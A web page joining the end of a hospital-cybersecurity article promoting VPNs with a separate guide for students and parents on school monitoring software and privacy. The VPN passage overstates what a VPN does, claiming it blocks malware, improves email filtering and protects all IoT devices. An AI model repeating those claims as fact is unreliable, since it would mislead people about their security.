**Enforce data encryption**

Criminals can hijack unencrypted data flying between storage and endpoint terminals. All data should be protected from input to the endpoint. A VPN can encrypt everything that enters and leaves a hospital’s digital system so that hackers can’t decipher the contents.

**What is a VPN, and what does it do?**

VPN technology creates a secure, private tunnel to pass data between, for example, your computer or mobile device and the hospital system’s storage device. It encrypts everything by turning it into an unreadable, useless data salad.

That private communication tunnel protects the data from prying eyes, and the encryption makes the data useless, even if someone manages to intercept it.

**What can a VPN do for hospitals?**

A VPN is critical to data protection, especially under HIPAA rules. A VPN can encrypt data, block unauthorized access, protect IoT equipment and IoT endpoints, block malware, improve email filtering and ensure that patient data remains protected during transit.

**Conclusion**

Hospitals and other health service providers are prime cybercrime targets. At the same time, HIPAA requires that they put in place a range of measures to protect patient data. It’s a tall and challenging order.

Fortunately, digital tools offer extraordinary solutions and safety features, and data encryption is a good place to start. You can use a VPN on iPhone, Android, all Windows and Linux devices, and all IoT devices like monitors, cameras, alarm systems, and other smart tech devices across the entire organization.

Cybersecurity Threats to Health Services: Why We Should Be Concerned

Colleges and K-12 campuses increasingly monitor student emails, social media, and more. Here’s how to secure your (or your child’s) privacy.

There are more eyes on students today than just a teacher’s watchful gaze. Thousands of school districts use monitoring software that can track students’ online searches, scan their emails, and in some cases, send alerts of perceived threats to law enforcement. A recent investigation by _The Dallas Morning News_ revealed that colleges have been using an AI social-media-monitoring tool to surveil student protesters.

While technology companies claim to be able to prevent violence, there’s little proof that surveillance can actually protect students. Meanwhile, monitoring software has been used to eveal students' sexuality without their consent. Low-income, Black, and Hispanic students are also disproportionately exposed to surveillance and discipline.

If your school (or your child’s school) uses monitoring software, there are a couple of steps you can take to protect your privacy—and start a conversation with your school.

Ask Your School These Questions

It’s important first to understand why your school is using monitoring software in the first place. In the US, schools _are_ required by the Children’s Internet Protection Act to have some kind of web filtering in place to prevent students from accessing obscene or harmful material online. Schools are _not_ required to implement sophisticated technologies that can scan the content of students’ emails and send alerts to police.

Next, find out your specific school’s exact monitoring practices. “A lot of these student activity monitoring tools are different. You don’t actually know the full scope of what it is until you’re able to have a conversation with someone,” says Marika Pfefferkorn, cofounder of the Twin Cities Innovation Alliance and executive director of the Midwest Center for School Transformation. Pfefferkorn also helps to lead the No Data About Us Without Us Institute, where she works to educate parents and students about data, privacy, and equity issues in their school district.

She suggests starting with a trusted teacher or counselor. If they don’t know specifics, or don’t have any documentation to answer your questions, that can be a red flag—and an indication that you may need to approach school or district leadership.

Here are some questions you can ask:

*   What software is being used? Does it operate on school devices, over the school Wi-Fi network, or both?
*   If it’s student monitoring software, what kind of information does the algorithm scan for? If the algorithm detects a “threat” or “inappropriate content,” who does the alert go to? At what point does content get flagged to a third party, such as law enforcement?
*   How is student data secured?
*   Where can students and parents report violations of privacy in the district? What processes does the district have to repair harm?
*   How much of the budget is used for surveillance technology?

Pfefferkorn also encourages asking your school to perform an audit of its monitoring software, which could reveal what kind of content the algorithm is tracking and how. An audit might reveal whether the software is truly effective or is picking up on false alarms. Encourage your school to document and inform parents of exactly what they track, how they store, and when they delete student data. Ask if you can have your child’s data deleted, or at least see what has been collected.

Act Like You’re Being Watched, Even After School

Whether you’re using your phone on your school’s Wi-Fi, or you’re using a school laptop at home, assume that everything you do is being scanned and logged by monitoring software. Did you plug in your personal phone to your school laptop? The photos on your phone might be scanned too.  Nude photos sent from students’ personal phones, if plugged into school devices to charge, have triggered alerts to school administrators.

“You should assume that anything touching your school-issued device is going to be monitored in some way,” says Jason Kelley, associate director of digital strategy at the nonprofit Electronic Frontier Foundation. Monitoring doesn’t stop after school or off-campus either.

If you’re a student, practice the basics of digital privacy. Don’t use your school laptop or Wi-Fi to search for anything sensitive, such as medical information. Remember that any kind of data or content on a school communications platform can be scanned and flagged: your school email address, the documents you type into your school Google Drive, your online searches, the images you download, the videos you watch. Even content that is completely safe might be flagged by the algorithm: For example, the software Gaggle can flag keywords related to LGBTQ identity such as ”gay” and “queer” as instances of bullying.

Even if you trust a handful of teachers or counselors, remember that your activity could be seen by other adults in the school, or even law enforcement. Don’t do anything on your device that you wouldn’t want them to see as well.

Others might advise students to “just use your personal device, on your family’s personal network.” It’s important to note that this kind of guidance isn’t accessible to all students. For low-income students, who might rely more on school technology, it may be more difficult to sidestep a school’s surveillance structures.

Mind Your Social Media

Schools might also use AI tools to track social media posts. This is particularly relevant for college students. While colleges generally don’t use content monitoring software, it’s likely they’ll monitor students’ social media for potential risk of violence or protest.

Just as you would assume that anything you type on your school-issued device can be seen and scanned by an algorithm, assume that your public social profiles can be, too. Even private accounts aren’t completely safe, says Kelley. (Yes, even your super-locked-down Finsta.) If you comment on a public account, for example, that might be scanned and subjected to social-media-monitoring algorithms as well.

If you’re in doubt, send text messages rather than using a social media platform. You might consider using an encrypted messaging app like Signal. If you’re discussing topics that might be more sensitive (such as reproductive rights access), the safest way to communicate is with a trusted person, in person.

Team Up With Other Students and Parents

After gathering your research, you might feel that your school isn’t using monitoring software fairly or appropriately. Pfefferkorn recommends having conversations with other students and parents. Listen to what they’re experiencing and how they’re thinking through it, especially if you want to push back against your school’s use of monitoring software.

If you feel you need legal support, reach out to a local agency. Pfefferkorn recommends your local ACLU, NAACP, or Restore the Fourth as good options for advocacy assistance.

Your school’s response will depend on whether you go to a public or private school. For example, a public school might be required to disclose more information, for example, about how much it spends on monitoring software. A private school would not be obliged to give that same information. As another example, while public schools must abide by the recent ruling that room-scanning proctoring software is unconstitutional, private schools do not.

Now is a critical moment for students, parents, and communities to help shape the future of safety in schools, according to Pfefferkorn. Congress passed a law that directs $300 million for schools to strengthen security infrastructure, in addition to the funding to schools through the American Rescue Plan. She hopes that communities can be more involved in how schools invest that funding, and can help shape more proactive solutions. “It’s really critical right now for us to prioritize our values as a community of what safety means,” she says. “For me, safety is not being surveilled.”

Tag

#wifi